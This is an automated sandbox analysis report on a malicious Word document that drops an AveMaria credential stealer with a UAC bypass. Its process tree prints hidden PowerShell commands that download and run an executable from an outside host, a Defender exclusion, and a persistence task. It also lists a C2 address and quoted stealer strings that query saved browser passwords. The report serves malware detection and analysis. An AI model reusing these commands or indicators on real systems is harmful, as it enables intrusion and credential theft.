Edit tour

Windows Analysis Report
Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc

Overview

General Information

Sample Name:	Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
Analysis ID:	708250
MD5:	9bc102ffb0930f5dee65bde8e0ba6d89
SHA1:	37cac7507a6ad02a75d947a9bdfe115f2da8b71b
SHA256:	959837140aee207e9fd845a030881f9430364d2df8088845f5828579420b1717
Tags:	doc
Infos:

Detection

AveMaria, UACMe

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (drops PE files)

Yara detected AntiVM3

Document exploit detected (creates forbidden files)

Snort IDS alert for network traffic

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Sigma detected: Scheduled temp file as task from temp location

Yara detected UACMe UAC Bypass tool

Yara detected AveMaria stealer

Document contains OLE streams with names of living off the land binaries

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Powershell drops PE file

Adds a directory exclusion to Windows Defender

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Uses schtasks.exe or at.exe to add and modify task schedules

Drops PE files with benign system names

Microsoft Office creates scripting files

Office process drops PE file

Injects files into Windows application

Writes to foreign memory regions

Increases the number of concurrent connection per server for Internet Explorer

Bypasses PowerShell execution policy

Contains functionality to hide user accounts

Tries to download and execute files (via powershell)

Suspicious powershell command line found

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Found suspicious RTF objects

Antivirus or Machine Learning detection for unpacked file

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

HTTP GET or POST without a user agent

Document misses a certain OLE stream usually present in this Microsoft Office document type

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Uses a known web browser user agent for HTTP communication

Binary contains a suspicious time stamp

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Internet Provider seen in connection with other malware

Yara detected Credential Stealer

Potential document exploit detected (performs DNS queries)

Enables debug privileges

AV process strings found (often used to terminate AV products)

Installs a raw input device (often for capturing keystrokes)

Detected TCP or UDP traffic on non-standard ports

Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 956 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

powershell.exe (PID: 1624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 264 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

explorer.exe (PID: 2360 cmdline: C:\Users\user\AppData\Roaming\explorer.exe MD5: 87B246B26208A9831A4372664C518C2C)

powershell.exe (PID: 2580 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

schtasks.exe (PID: 2220 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

MSBuild.exe (PID: 568 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 7FB523211C53D4AB3213874451A928AA)

MSBuild.exe (PID: 2040 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 7FB523211C53D4AB3213874451A928AA)

powershell.exe (PID: 1312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 2540 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

explorer.exe (PID: 676 cmdline: C:\Users\user\AppData\Roaming\explorer.exe MD5: 87B246B26208A9831A4372664C518C2C)

powershell.exe (PID: 2948 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

schtasks.exe (PID: 2172 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

MSBuild.exe (PID: 1228 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 7FB523211C53D4AB3213874451A928AA)

powershell.exe (PID: 2072 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 904 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

explorer.exe (PID: 1248 cmdline: C:\Users\user\AppData\Roaming\explorer.exe MD5: 87B246B26208A9831A4372664C518C2C)

powershell.exe (PID: 1448 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

schtasks.exe (PID: 2448 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

MSBuild.exe (PID: 2884 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 7FB523211C53D4AB3213874451A928AA)

verclsid.exe (PID: 900 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)

notepad.exe (PID: 2520 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT MD5: B32189BDFF6E577A92BAA61AD49264E6)

cleanup

Malware Configuration

Threatname: AveMaria

{"C2 url": "20.126.95.155", "port": 7800}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc	INDICATOR_RTF_Exploit_Scripting	detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.	ditekSHen	0x8c12:$clsid2: 0003000000000000C000000000000046 0x8370:$ole6: D0Cf11E 0x7cd:$obj2: \objdata 0x8325:$obj2: \objdata 0x8311:$obj3: \objupdate 0x828c:$obj4: \objemb 0x9890:$obj4: \objemb 0x827b:$obj6: \objlink 0x8e0:$sct1: 33 43 37 33 36 33 37 32 36 39 37 30 37 34 36 43 36 35 35 34

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xa8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xa8:$c1: Elevation:Administrator!new:
00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000013.00000002.962831144.0000000001B86000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x949:$s3: System.Net.WebClient).DownloadFile('httP
00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x5200:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x3a48:$a2: SMTP Password 0x2c88:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x5108:$a5: for /F "usebackq tokens=*" %%A in (" 0x3478:$a6: \Torch\User Data\Default\Login Data 0x3fe4:$a8: "os_crypt":{"encrypted_key":" 0x3910:$a10: \logins.json 0x3f5c:$a11: Accounts\Account.rec0 0x2820:$a12: warzone160 0x4eb0:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x864d8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x864d8:$c1: Elevation:Administrator!new:
00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x83900:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x82148:$a2: SMTP Password 0x81388:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x864d8:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x83808:$a5: for /F "usebackq tokens=*" %%A in (" 0x81b78:$a6: \Torch\User Data\Default\Login Data 0x865f8:$a7: /n:%temp%\ellocnak.xml 0x826e4:$a8: "os_crypt":{"encrypted_key":" 0x86628:$a9: Hey I'm Admin 0x82010:$a10: \logins.json 0x8265c:$a11: Accounts\Account.rec0 0x80f20:$a12: warzone160 0x835b0:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000004.00000002.916223647.00000000000BE000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x3b619:$s3: System.Net.WebClient).DownloadFile('httP
00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x2a0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2a0:$c1: Elevation:Administrator!new:
00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x327c:$s3: System.Net.WebClient).DownloadFile('httP
00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x279a:$sb1: -W Hidden 0x323b:$sb1: -W Hidden 0x277a:$sc1: -NoP 0x322b:$sc1: -NoP 0x278e:$sd1: -NonI 0x3235:$sd1: -NonI 0x27ae:$se3: -ExecutionPolicy bypass 0x3245:$se3: -ExecutionPolicy bypass 0x2784:$sf1: -sta 0x3230:$sf1: -sta
00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x3230:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1a78:$a2: SMTP Password 0xcb8:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x3138:$a5: for /F "usebackq tokens=*" %%A in (" 0x14a8:$a6: \Torch\User Data\Default\Login Data 0x2014:$a8: "os_crypt":{"encrypted_key":" 0x1940:$a10: \logins.json 0x1f8c:$a11: Accounts\Account.rec0 0x850:$a12: warzone160 0x2ee0:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x37828:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x143460:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x37828:$c1: Elevation:Administrator!new: 0x143460:$c1: Elevation:Administrator!new:
00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x34c68:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1408a0:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x334b0:$a2: SMTP Password 0x13f0e8:$a2: SMTP Password 0x326f0:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x13e328:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x37828:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x143460:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x34b70:$a5: for /F "usebackq tokens=" %%A in (" 0x1407a8:$a5: for /F "usebackq tokens=" %%A in (" 0x32ee0:$a6: \Torch\User Data\Default\Login Data 0x13eb18:$a6: \Torch\User Data\Default\Login Data 0x37948:$a7: /n:%temp%\ellocnak.xml 0x143580:$a7: /n:%temp%\ellocnak.xml 0x33a4c:$a8: "os_crypt":{"encrypted_key":" 0x13f684:$a8: "os_crypt":{"encrypted_key":" 0x37978:$a9: Hey I'm Admin 0x1435b0:$a9: Hey I'm Admin 0x33378:$a10: \logins.json 0x13efb0:$a10: \logins.json 0x339c4:$a11: Accounts\Account.rec0
00000009.00000002.937256768.0000000001BA6000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x949:$s3: System.Net.WebClient).DownloadFile('httP
00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xdf0:$c1: Elevation:Administrator!new:
00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x26e0:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0xf28:$a2: SMTP Password 0x168:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x25e8:$a5: for /F "usebackq tokens=*" %%A in (" 0x958:$a6: \Torch\User Data\Default\Login Data 0x14c4:$a8: "os_crypt":{"encrypted_key":" 0xdf0:$a10: \logins.json 0x143c:$a11: Accounts\Account.rec0 0x2390:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000004.00000002.916438854.0000000001B86000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x949:$s3: System.Net.WebClient).DownloadFile('httP
00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x3c08:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x2450:$a2: SMTP Password 0x1690:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x3b10:$a5: for /F "usebackq tokens=*" %%A in (" 0x1e80:$a6: \Torch\User Data\Default\Login Data 0x29ec:$a8: "os_crypt":{"encrypted_key":" 0x2318:$a10: \logins.json 0x2964:$a11: Accounts\Account.rec0 0x1228:$a12: warzone160 0x38b8:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000013.00000002.961202850.000000000010E000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x39719:$s3: System.Net.WebClient).DownloadFile('httP
00000013.00000002.961145654.00000000000D0000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x327c:$s3: System.Net.WebClient).DownloadFile('httP
00000013.00000002.961145654.00000000000D0000.00000004.00000020.00020000.00000000.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x279a:$sb1: -W Hidden 0x323b:$sb1: -W Hidden 0x277a:$sc1: -NoP 0x322b:$sc1: -NoP 0x278e:$sd1: -NonI 0x3235:$sd1: -NonI 0x27ae:$se3: -ExecutionPolicy bypass 0x3245:$se3: -ExecutionPolicy bypass 0x2784:$sf1: -sta 0x3230:$sf1: -sta
00000009.00000002.936804353.0000000000350000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x327c:$s3: System.Net.WebClient).DownloadFile('httP
00000009.00000002.936804353.0000000000350000.00000004.00000020.00020000.00000000.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x279a:$sb1: -W Hidden 0x323b:$sb1: -W Hidden 0x277a:$sc1: -NoP 0x322b:$sc1: -NoP 0x278e:$sd1: -NonI 0x3235:$sd1: -NonI 0x27ae:$se3: -ExecutionPolicy bypass 0x3245:$se3: -ExecutionPolicy bypass 0x2784:$sf1: -sta 0x3230:$sf1: -sta
00000009.00000002.936976360.00000000003D9000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x1c29:$s3: System.Net.WebClient).DownloadFile('httP
0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x6eae0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x6eae0:$c1: Elevation:Administrator!new:
0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x6bf08:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x6a750:$a2: SMTP Password 0x69990:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x6eae0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x6be10:$a5: for /F "usebackq tokens=*" %%A in (" 0x6a180:$a6: \Torch\User Data\Default\Login Data 0x6ec00:$a7: /n:%temp%\ellocnak.xml 0x6acec:$a8: "os_crypt":{"encrypted_key":" 0x6ec30:$a9: Hey I'm Admin 0x6a618:$a10: \logins.json 0x6ac64:$a11: Accounts\Account.rec0 0x69528:$a12: warzone160 0x6bbb8:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x99104:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x99104:$c1: Elevation:Administrator!new:
00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x9652c:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x94d74:$a2: SMTP Password 0x93fb4:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x99104:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x96434:$a5: for /F "usebackq tokens=*" %%A in (" 0x947a4:$a6: \Torch\User Data\Default\Login Data 0x99224:$a7: /n:%temp%\ellocnak.xml 0x95310:$a8: "os_crypt":{"encrypted_key":" 0x99254:$a9: Hey I'm Admin 0x94c3c:$a10: \logins.json 0x95288:$a11: Accounts\Account.rec0 0x93b4c:$a12: warzone160 0x961dc:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
Process Memory Space: explorer.exe PID: 2360	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: explorer.exe PID: 2360	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: explorer.exe PID: 2360	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: powershell.exe PID: 1312	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x19f69:$s3: System.Net.WebClient).DownloadFile('httP 0x28adc:$s3: System.Net.WebClient).DownloadFile('httP 0x3dec6:$s3: System.Net.WebClient).DownloadFile('httP 0x3f19b:$s3: System.Net.WebClient).DownloadFile('httP 0x3f2a2:$s3: System.Net.WebClient).DownloadFile('httP 0x8a601:$s3: System.Net.WebClient).DownloadFile('httP 0x9cdf1:$s3: System.Net.WebClient).DownloadFile('httP 0x9d06c:$s3: System.Net.WebClient).DownloadFile('httP 0x9d77c:$s3: System.Net.WebClient).DownloadFile('httP 0x9d884:$s3: System.Net.WebClient).DownloadFile('httP
Process Memory Space: MSBuild.exe PID: 2040	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: MSBuild.exe PID: 2040	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: powershell.exe PID: 2072	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x2917:$s3: System.Net.WebClient).DownloadFile('httP 0x2a1e:$s3: System.Net.WebClient).DownloadFile('httP 0x7589:$s3: System.Net.WebClient).DownloadFile('httP 0x2e7f1:$s3: System.Net.WebClient).DownloadFile('httP 0x33e1c:$s3: System.Net.WebClient).DownloadFile('httP 0x67078:$s3: System.Net.WebClient).DownloadFile('httP 0x76010:$s3: System.Net.WebClient).DownloadFile('httP 0x76117:$s3: System.Net.WebClient).DownloadFile('httP 0x7c8fc:$s3: System.Net.WebClient).DownloadFile('httP 0x7cb64:$s3: System.Net.WebClient).DownloadFile('httP
Process Memory Space: explorer.exe PID: 676	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: explorer.exe PID: 676	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: explorer.exe PID: 676	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: explorer.exe PID: 1248	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: explorer.exe PID: 1248	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: explorer.exe PID: 1248	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 60 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
17.3.MSBuild.exe.6a5d90.1.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0xb18:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
17.3.MSBuild.exe.6a5d90.1.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xb18:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xb18:$c1: Elevation:Administrator!new:
17.3.MSBuild.exe.6a5d90.1.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
29.2.explorer.exe.28d63b8.2.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x4c728:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
29.2.explorer.exe.28d63b8.2.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x4c728:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x4c728:$c1: Elevation:Administrator!new:
29.2.explorer.exe.28d63b8.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a08:$a1: \Opera Software\Opera Stable\Login Data 0x47d30:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47678:$a3: \Google\Chrome\User Data\Default\Login Data
29.2.explorer.exe.28d63b8.2.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
29.2.explorer.exe.28d63b8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
29.2.explorer.exe.28d63b8.2.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
29.2.explorer.exe.28d63b8.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x49bfd:$r1: Classes\Folder\shell\open\command 0x49c20:$k1: DelegateExecute
